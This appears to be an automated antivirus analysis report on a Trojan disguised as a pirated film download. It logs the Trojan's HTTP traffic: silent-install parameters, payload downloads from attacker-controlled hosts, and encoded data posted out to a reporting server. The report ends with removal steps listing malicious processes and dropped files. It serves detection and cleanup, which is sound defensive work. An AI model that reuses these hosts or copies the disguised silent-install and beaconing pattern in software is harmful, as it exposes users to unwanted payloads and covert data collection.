data=ACXF6JRElEdb1m3OabzJ3D2b5w+m8D2mXeYYaRzI1yxvnemJCt52ZBFyMtNgLpO4pLxyGsAjeqZ9OswCYbl2+jbbpPr1RyQfI3ee6GhykO3VawGEWa7pnDSSQuBaulvNJ7p7aGFXgYcpy1Q3Va8Z9z1lH5tjXJSzqEhvz1Mmk1JHLogUfHTG4O9SW8b4DDNGE5CXvVq1OfOLn3hESSnmuaV3xGFr58fqsJt3lZQaLG//sV9aZlaxP2QorO7MNUpVWN59oPiCb1bGEEQ/gR06Z+VexU0Hi+O+NbivyVWQXAzisr6D9FdBrwjxmOJcWF4ODPp8KGF9PW85BmyzcNxu0X4/Sl0zAkvi1yJyEhPST9z7ZS1gh5OqXYW9ZUxeKMkDRqRxNeweBNm7bdSzbRzpEEIdEaZb51mvpSi/HtcQNyvqEUac7jNytxQk06WVLKNvf/FGtj1JJduRfa/mSZB39gbEXetLxJWyK6Rhc/k23WQ58Yr4S7EvnwBQPTFJp7wuTVFxVIxg3+n+FMKFKK+6UXK4WHt+jLh0VFAiKV+ZZ5mHtqr77bC8UuN89eyOZr9dw1dGIOeHK3N/NeJxvtepOiJ62fXuS6y8JZgr2QdyYGCKL7W6fEE6wOns7lzghO7UZL9I85OF2vehjR1ObSAao2/TAS90vFZB9xEACm0eh1+wyF2py4V74dNue8Hmw+GBRg1xbh4B0E4wxrKpprwDfO9aug9i1RYrLwA/gkGp9SpbzIemgfyIUu0+La5MGJkHAQMLN81FAGR4BopxrV5gWdCIIUOH/nqcoQI0Mtb+F6RiwmwnigStk0p4auATkhbWwo8eZKvC0pWNy5igdXs4vYP/qaCLlnE8JBS0G3nMEp7n7nugqeiqxUciJ38yOoux7FYMRThgDBuZmfEZmMK98pj77a4/c7IqCnf703wNwpcE2TfwYmnmitHqGCF2kVuKW45LX5qq5zFRl/GQevshp2rpnf7IMCqi8svICAXLoe0q3LF/Vak8VJhO8oZDsojn3P7goiz8LeLNNCJXZ&report=/ZdSMEwjhs5jh48PRJ8mip8v1zaz/Q8ivu94Okb/5gSwlGGAuO7ilKkT47yCunU7erZ+byBdPtIeayaAqJZ8aTJqhgTuU8A3RysXRmq19j9zYa5AKLq903wDcTNPRwl7fHTkzc3j6q+L7227LVx67xiBr7WKDuvXV1dH3+AUf+jj8TUpuNuJHKuYqxCgX1clEWk8OXjIG1z+Lh+tAnr6
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..


GET /get/?data=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&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:59 GMT
Content-Length: 0
Connection: close


GET /?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:36 GMT
Content-Type: text/html
Content-Length: 10242
Connection: close
Content-Disposition: attachment; filename="6_1_3.txt"

<<< skipped >>>

GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:21 GMT
Content-Type: application/octet-stream
Content-Length: 2275179
Connection: close
Content-Disposition: attachment; filename="g7CyPVZagCsRV8.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:38 GMT
Content-Type: application/octet-stream
Content-Length: 2252297
Connection: close
Content-Disposition: attachment; filename="dB1XJloRgbF4Qw.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:53 GMT
Content-Type: text/html
Content-Length: 10306
Connection: close
Content-Disposition: attachment; filename="6_1_4.txt"

<<< skipped >>>

GET /?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:08 GMT
Content-Type: text/html
Content-Length: 31266
Connection: close
Content-Disposition: attachment; filename="6.txt"

<<< skipped >>>

GET /?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:01 GMT
Content-Type: text/html
Content-Length: 8236
Connection: close
Content-Disposition: attachment; filename="6_2.txt"

<<< skipped >>>

GET /?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:12 GMT
Content-Type: text/html
Content-Length: 4214
Connection: close
Content-Disposition: attachment; filename="6_2_1.txt"

<<< skipped >>>

GET /?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:55 GMT
Content-Type: application/octet-stream
Content-Length: 524274
Connection: close
Content-Disposition: attachment; filename="fyBYRfMAYKA66R.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

HEAD /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:55:14 GMT
Content-Type: application/octet-stream
Content-Length: 1085440
Last-Modified: Wed, 04 Feb 2015 13:58:06 GMT
Connection: close
ETag: "54d2256e-109000"
Accept-Ranges: bytes


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5998
Cache-Control: no-cache

data=4hUxCFbegoHZp34567yEl&report=Ybk79iZRZdw4WMPHwyTBrK6KHsoau9uwVsAOVy/MzQAcIXkQxSglS131JAsyvoEJNT6ZW0YJNPp0DFdPYmkehHyRGNPVt4ZhejkGjVIgHBf25unVVe9Y7O9kxVaW94sj9Y/YFRXES2DGbxEKtENa5KV xVn42Z3ufm0bn6t29AeWjaPYa4Vc MV4sO3TJ/KFZcEmFL5HOQM9SoVeBScasmPsVJftvIRU9l//Tc/ oKrHv6lAQQzKO10K5szW0c5cTObz6GlihFziTSq6Zgh0f8h9Yppf9wp2HXE7EB9zFve38MfuDXR6rhDQO/n1di43TGPWQ4HNFKHxrVMd0MnF/Vdicc24wLcq4ILBiXuO5yij58LxT7RqYKVT5hkEebv5nUd7Lebgo10MKh9/cUnCEFbnHuKVQ0thBl7TEFtbrInAj6 e3Vy6fqFRkVsp8 aKNSZEukqkDiMTW4TFJ1eypYGPLbMk3JVwOfVaeXcYS8HXCET5KeSV8xjpLksaLJyJRcnSiz6wEgCcBP3wdvITes vHhUpCn1r4IkaD5PzyKfanIy6PMFaX1IvVV2DTUd7xsN0ENELfo1XyT2LS4YiV64O1rgthy4cXwE1b6bZuHgyf9 ybjWcBEJJAQbN/UcHNemTyckhBB/0JvmDdqgyQyCQSsi1n4aScyJvjqTkntGVnzu2bHc/ OBM0I90aeaT1FalZKIr9VNaUIsvzmeZLl7iLlt Fz1bF8S4qh9SQaYCCSArBdzW2Fy8q9R/ulTQJX DyQZLOBuLPiZ1BRgZ/IJJPwyyMg28zVxUeslGvwKNkCAW8S51tR1WI75/nz12p6Xwlt8Gfm2V1Y2QyGJ53hM/4wV3NE6Nbyk9hXyR0w8PcVoZw8q5UTqll MORPm42L3oC//TacRF2jF6cSDaU JtSt9lDweTSv8c3YSEcg9SaDx2V  6E2cmQMVqJR7S6Xbx3MPEqT/hFXn5rXCVHY9VwSYPMp6mS6pXk/xNdpMSg5d14xx9IqVSH9N8brrC30q1Ek h12IF8FmIlYa tHCflb2ieTcAuEWvJflXyWOmAjnKVzErTGNydVcFoeyT ytH5ZPmiiVqgam1uRgeieBNeSDVXc/yKT/W 8qvSkvfrCpCkjEoEgSrpqwB2wPrTG77N0pr/sfbjQz/NNKmYUWVFVXZpucETPgjccl65g58y2GjmWjSj4VMfCPpGEAdHjl1CJjlvisyScESGl11ObgnXZw3 CaDeCILByaZRDQpscMWQ0yjf8/C
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:51 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..


GET /?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:13 GMT
Content-Type: text/html
Content-Length: 8398
Connection: close
Content-Disposition: attachment; filename="7.txt"

<<< skipped >>>

GET /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:54:04 GMT
Content-Type: application/octet-stream
Content-Length: 3439893
Last-Modified: Thu, 18 Jun 2015 08:40:11 GMT
Connection: close
ETag: "558283eb-347d15"
Accept-Ranges: bytes

<<< skipped >>>

HEAD /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:54:03 GMT
Content-Type: application/octet-stream
Content-Length: 3439893
Last-Modified: Thu, 18 Jun 2015 08:40:11 GMT
Connection: close
ETag: "558283eb-347d15"
Accept-Ranges: bytes


GET /?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8292
Connection: close
Content-Disposition: attachment; filename="4_1.txt"

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5922
Cache-Control: no-cache

data=qhcYUBOKdgCLOYSUMOhhU&report=jN8R3Ac9OgScSS1JLF/3jtm7mnRiJUrNKJKIDxUWpfEoUQ4J8kf8cQ7JkXJk5e8Zu7VSXiCoZFu4sczsdTuhwVfBO/ztm2TpmiYcyZdyHB68A6kKbaDTeq7nG3KA1chT8NE59WpFTcW VSWv66cxat2bz4JSTBSKEG1O13Uy3CQjCE4E270cbIYb7wNTEFujhenU5/29f8b5qOQM0iLpWE4ClGC2nT3izFhh Q1ZPVWxpGrk0DqrytN9P36MPdE60qpG2LvwI6Gt8KlUlTU1ZlD k4Iooprj8kBWbF18Hq7h9/iQBqCYSGoT90ZeuOrgBQQRy5zINUonT12IPTlPVj3VEZoOIc23y8iI4p75qqaKJVgw8igKCBhZ3UTcqTDepYb0Prf9rew3gLc0d0IpsAgv4Gzqif52/a0AaSy0t5DIEDnXt1CzVHl6LL7/zGy40xoIfUuIiKnc0x1I8l/WP7YyY3eQUmfSfjLWPF923lKjVy0xHNAyojCOCoZGfvSiYotCeQr5e6KnzmiKyMakKOdunwoFchcFIM23CmM3BngWK4V8 Ch5uOKqzoY6WchJlzxht1dxReAfys3pWas51wVDDQ3vAmettU/q40Ih5A8DkUiM3muL IOIRazpMBMI xNK2h2XEe6m8qi4SuXgi26KRYvg1u7OnHS4dl8k9EmujmAfx3y1cu5WiGRb Mq5EbVdja/qd0alFmAZQ812a02AE7vSptfe1iWyXi xak6FUzGAgdY2WtA84vyrI3GNVpPE28abUGOKzxGZ6bni/iTegMnQF/6aSoUcqw4 R6kIVrN9kOPXk9DNS5s47YnGWXTCKPDHugdfWp31Jsji5vggk3iKNhE6Oo2HxTztFW4vG9COhEYDJEr1PKMnZJtufsT6jnaAZ4fDJLcja04cqSXApCwYmGxUxKjFKOw4aXSekZ1XmL3 0qQPvsh3tc 3piBjm8QXIxlGiwUtk gt8QXaIou0I1JsCi5m/dUG/i6Bx5cexsOe4rcY667KsLRZeraT8jIutxpx42FYJ/U19xaGA/o0vnVnQ1N6gkc1oqXp8qhPlhagmr3WzvnNtV0hgA3SYyDm6HXN/DQ 1MT1VdkXj8cAG6tunRWsrWdif1msUwxhWWzN2SfRDWz7bpZFDkN cEbpch3epFK7wzTyCROAfMPos4EDcJn8e3AZcCYFHxKDEtn veEuFX3k/b1zIJA/iEkz RQg0qXnd7I8wd9dXv5m9J Q1NnUEsLCfrGoHedLGWxPCJAz
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5894
Cache-Control: no-cache

data=tYVyuHeBHFqO123456wKW&report=NoTw8vkdBiAq45rpniL0qPoO2bms2f/VMQsXgjfYWG82WyOr6niAS1/gNW47vU/GIOPGB0YR83uereBsdmkekOKm3j zS4ZaL9Xq Ukc3Flnh9iPw3Hnoc9kxrdamFtlX3t4fZFUaVbSb0vCnrKybw iMSqUP64rIVQsacWFiKmlDlxstGskUKlGr7lD4V1ikB7dXHkt7VJzvVnn9N53TyKKCn1B215SYOp81xkUXyaW7qHn4T61kzTS CaonJXJkaTbNnfuzZ6gX8IEkyzOh7QYwy29ARqQWaJhwuI1B5d1ZgO5pZJJIVP6qHENZqGe4lHxeLX5jnDwuTZpKzs YYl2zGF3h1gn oxWPjDFDskCsc8gFH7IcbkT51WsVFGqAcQe2aL4aL3PFpyTaDpwVjz271G7D8gfU7/LdXej61uQSREccUnXwfN7FFng4fbzPyhaqJKl/ovqs7dgMG03kLdg9W/Dxfwx2RL/DBefA2yAZp0v8rI3RCH8SYNzPg4vnMTf7v ljJR/zra3zkh3PYoVUG1FDXtvyWJePEfqc0R4qhSgMn8fY6IAOSAWvK1vRDnPNkK49rfCHQ1o6UTMH3CcfCoSv1L0ZXRhvRwRTG6L7bIehkJ4OTbrfQS1hTyQbcy400GmhXawJm2Q2ze3eGjPEoEpOBqJfhQsFbEjupeYzZKhH/yhfnd2e1W8J6W9Z5tCzPSjh4Jg6OYD77yoO7U8e8s8U6B5DQ uW5TGRIMeQzvrbjuh7ThvLw465DOPMqwi76soxpkynQHCFbDzvidt5VMjXg5aO4uKqvB jjyQGFGwvGQ0uxXJMY0J8n8 iUhtcsZ0doRpNCz88243Uh/VBYaftroiFza52tLFDBfr54fNkulUDAT4Qe1JXJgWelZD5BhTR7wOp4OHAq5zQWj W/SdLsrTOVP/Ft8fb7mXqIb5TE228DRYJ8DHs3/2RjPNLsNUYD0kmuYiqO G9Im2dRw5yv/1GVll9rm9Xqnh0YeAbBEXF5DcZWxmGOLp3KhlG XxWdqAD8rpYSqudr7tLQBPjlhk7ma6cMNT6waLUO95ieFT7mbu4YWwbOZ2c3NfCe77wyXoG7pkcSvZqJUYZsu4m2NGQE/TUGeVwkNywrVBOSYeujc49eDNjmb63CT8NilJCfy8e6RKVYNtCMFTIha37CvXNvfGp2LmtWSDW49NgxC6fLOcxzHmhfycsmJht7l3c02OB9FImM11lXd1d5pKc6mgAU7IsGG1VTdKxi/RhS8qqlhM
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:59 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..


GET /?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: text/html
Content-Length: 8316
Connection: close
Content-Disposition: attachment; filename="3.txt"

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

rundll32.exe_1016:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1304
    %original file name%.exe:996
    %original file name%.exe:592
    %original file name%.exe:1936
    %original file name%.exe:440
    NybbleCrawler.xyz.exe:356
    rundll32.exe:1256
    regsvr32.exe:2008
    regsvr32.exe:1784
    hpds_setup.exe:164

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
    %WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
